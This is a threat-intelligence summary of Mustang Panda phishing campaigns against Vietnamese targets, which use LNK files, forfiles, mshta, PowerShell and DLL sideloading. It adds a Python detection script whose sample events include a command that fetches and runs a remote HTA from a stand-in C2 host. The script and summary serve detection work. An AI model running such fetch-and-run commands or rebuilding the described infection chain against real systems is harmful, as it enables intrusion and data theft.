Vietnamese Entities Targeted by China-Linked Mustang Panda in Cyber Espionage 

Cyble researchers identified Mustang Panda campaigns using Windows shortcut (LNK) files to target Vietnamese entities with tax compliance and education-themed lures, employing multi-stage infection chains. The operations abuse legitimate tools (forfiles, PowerShell, MSHTA) and DLL sideloading to execute payloads, exfiltrate data, and maintain persistence, potentially enabling later stages like PlugX. #MustangPanda #LNK #forfiles #PowerShell #MSHTA #DLLSideloading #TaxCompliance #Education #Vietnam

Key points

  • CRIL observed campaigns using Windows shortcut (LNK) files associated with Mustang Panda targeting Vietnamese entities.
  • Mustang Panda is a China-based APT with potential state-affiliated activity, targeting NGOs and government/security-related sectors across multiple regions.
  • The campaigns in Vietnam focused on Tax Compliance and Education lures in May 2024 and April 2024, respectively.
  • The infection chain begins with spam emails containing attachments, often ZIP/RAR archives with malicious LNKs.
  • Threat actors embed partial lure documents inside LNKs to increase file size and evade detection.
  • Techniques include abusing forfiles.exe to launch mshta.exe, which retrieves a remote HTA file that in turn runs PowerShell, followed by DLL sideloading and startup persistence.
  • Loader DLLs create mutexes, establish RUN persistence, and retrieve encrypted data from remote servers before communicating with C2 endpoints; PlugX is discussed as a potential subsequent stage.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – VBScript and PowerShell scripts are executed. ‘VBScript and PowerShell scripts are executed.’
  • [T1204] User Execution – Spam email with attachments initiates infection. ‘The initial infection starts with a spam email with attachments.’
  • [T1073] DLL Side-Loading – Malicious DLLs are sideloaded by legitimate applications. ‘DLL sideloading of the malicious loader file HPCustPartUI.dll using the legitimate HP.exe executable.’
  • [T1547] Boot or Logon Autostart Execution – Persistence via RUN entry and Startup mechanisms. ‘creates a RUN entry for the HP.exe file’ and related Startup Folder usage.
  • [T1060] Registry Run Keys / Startup Folder – Autorun registry entry added. ‘Autorun registry entry added.’
  • [T1036] Masquerading – Double extension is used for masquerading. ‘Double extension is used for masquerading.’
  • [T1027] Obfuscated Files or Information – Obfuscated PowerShell and VBScript are used. ‘Obfuscated PowerShell and VBScript are used.’
  • [T1082] System Information Discovery – System information is exfiltrated and sent to a remote server. ‘System information is exfiltrated and sent to a remote server.’
  • [T1087] Account Discovery – User accounts are checked in the system. ‘User accounts are checked in the system.’
  • [T1518.001] Security Software Discovery – Querying Antivirus Products. ‘Querying Antivirus Products.’
  • [T1005] Data From Local System – Crucial data from the system is exfiltrated. ‘Crucial data from system is exfiltrated.’
  • [T1041] Exfiltration Over C2 Channel – Data is sent to remote system over C2. ‘Data is sent to remote system over C&C.’
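The infection chain in the key points and the techniques listed above (forfiles.exe proxying mshta.exe, a remote HTA, sideloading of HPCustPartUI.dll/wwlib.dll/Book.dll, and a Run-key entry) translate into a few host-level detection rules. The following is an added example, not code from Cyble's report; the Sysmon-style field names (event, image, parent, cmdline, loaded, target, details), the domain c2.example.invalid and the sample events are constructed.

```python
"""Detection rules for the forfiles -> mshta -> DLL-sideloading -> Run-key chain."""
import re

SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")
SIDELOAD_DLLS = {"hpcustpartui.dll", "wwlib.dll", "book.dll"}  # names from the report

def detect(event: dict) -> list[str]:
    """Return the names of the rules an event triggers (empty list if benign)."""
    hits = []
    img = event.get("image", "").lower()
    parent = event.get("parent", "").lower()
    cmd = event.get("cmdline", "").lower()
    if event["event"] == "process_create":
        # T1059/T1204: forfiles.exe used as a proxy to start a script host
        if parent.endswith("forfiles.exe") and img.split("\\")[-1] in ("mshta.exe", "powershell.exe", "cmd.exe"):
            hits.append("forfiles_proxy_exec")
        # T1059: mshta.exe pulling an HTA over HTTP(S) instead of a local file
        if img.endswith("mshta.exe") and re.search(r"https?://", cmd):
            hits.append("mshta_remote_hta")
    elif event["event"] == "image_load":
        # T1073: a DLL with one of the loader names, loaded from outside system directories
        loaded = event.get("loaded", "").lower()
        if loaded.split("\\")[-1] in SIDELOAD_DLLS and not loaded.startswith(SYSTEM_DIRS):
            hits.append("dll_sideload_user_path")
    elif event["event"] == "registry_set":
        # T1547/T1060: Run-key value pointing at an executable in a user-writable path
        target = event.get("target", "").lower()
        value = event.get("details", "").lower()
        if "\\currentversion\\run\\" in target and not value.startswith(SYSTEM_DIRS):
            hits.append("run_key_user_path")
    return hits

# Constructed sample events (assumed field names); not telemetry from the report.
SAMPLE_EVENTS = [
    {"event": "process_create", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\forfiles.exe",
     "cmdline": "mshta http://c2.example.invalid/Vanban_8647.PDF_update.hta"},
    {"event": "process_create", "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
    {"event": "image_load", "image": r"C:\Users\u\AppData\Roaming\HP\HP.exe",
     "loaded": r"C:\Users\u\AppData\Roaming\HP\HPCustPartUI.dll"},
    {"event": "registry_set",
     "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\HP",
     "details": r"C:\Users\u\AppData\Roaming\HP\HP.exe"},
]

def triage(events: list) -> dict:
    """Map each event's index to the rules it triggered, skipping benign events."""
    return {i: detect(e) for i, e in enumerate(events) if detect(e)}

if __name__ == "__main__":
    for idx, rules in triage(SAMPLE_EVENTS).items():
        print(idx, rules)
```

The Run-key rule deliberately keys on the executable's location rather than the name HP.exe, since the report notes the loader is staged under a legitimate-looking name.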

Indicators of Compromise


Read more: https://cyble.com/blog/vietnamese-entities-targeted-by-china-linked-mustang-panda-in-cyber-espionage/